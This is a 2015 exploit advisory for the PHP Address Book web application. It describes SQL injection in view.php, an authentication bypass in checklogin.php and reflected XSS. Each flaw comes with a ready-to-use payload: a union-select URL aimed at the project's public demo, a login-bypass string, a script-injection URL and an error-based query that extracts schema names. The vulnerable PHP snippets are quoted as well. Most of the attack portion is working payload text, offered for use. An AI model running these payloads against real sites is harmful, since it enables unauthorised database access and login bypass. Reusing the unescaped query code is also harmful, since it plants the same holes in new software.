PHP Address Book Cross Site Scripting / SQL Injection

`##################################################################################################  
#Exploit Title : PHP Address Book SQL Injection and xss vulnerability  
#Author : Manish Kishan Tanwar  
#Home page Link : http://sourceforge.net/projects/php-addressbook/  
#Date : 01/01/2015  
#Discovered at : IndiShell Lab  
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi  
#email : [email protected]  
##################################################################################################  
  
////////////////////////  
/// Overview:  
////////////////////////  
  
  
php address book is web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported. PHP / MySQL based.  
///////////////////////////////  
// Vulnerability Description:  
///////////////////////////////  
1. SQL injection   
2. Authentication bypass  
3. XSS  
  
1.SQL injection vulnerability:-  
==============================   
after login(using normal user account) attacker can exploit this issue.  
parameter id is not escaping before passing to SQL query on view.php  
vulnerable code is   
-------------------  
if ($id) {  
  
$sql = "SELECT * FROM $base_from_where AND $table.id='$id'";  
$result = mysql_query($sql, $db);  
$r = mysql_fetch_array($result);  
  
$resultsnumber = mysql_numrows($result);  
}  
--------------------  
POC  
http://php-addressbook.sourceforge.net/demo/view.php?id=1337' union select 1,2,3,4,version(),6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+  
  
image link:-  
http://oi62.tinypic.com/2lncw3a.jpg  
  
2.Authntication Bypass:-  
=======================  
checklogin.php page is passing user supplied data in username field to sql query without escaping and it is causing authentication  
bypassing using payload   
username = ' or 1336%2B1=1337--%20  
password = any  
--------------------------------------------------------  
$urlun = strip_tags(substr($_REQUEST['username'],0,32));  
  
$urlpw = strip_tags(substr($_REQUEST['password'],0,32));  
$cleanpw = md5($urlpw);  
  
$sql="SELECT * FROM users WHERE username='$urlun' and password='$cleanpw'";  
--------------------------------------------------------  
  
3.XSS:-  
======  
http://php-addressbook.sourceforge.net/demo/  
?group=customer</option></select><script>alert(String.fromCharCode(120,115,115,32,116,101,115,116));</script>  
  
image link:-  
http://oi59.tinypic.com/dhbyh4.jpg  
  
  
////////////////  
/// POC ////  
///////////////  
  
POC image=http://oi57.tinypic.com/inv3ol.jpg  
payload for extracting database name   
set value of category parameter to 1 and add error based SQL injection payload to url  
  
http://127.0.0.1/pr/browse.php?category=1 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)  
  
  
--==[[ Greetz To ]]==--  
############################################################################################  
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,  
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,  
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,  
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das  
#############################################################################################  
--==[[Love to]]==--  
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,  
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)  
--==[[ Special Fuck goes to ]]==--  
<3 suriya Cyber Tyson <3  
`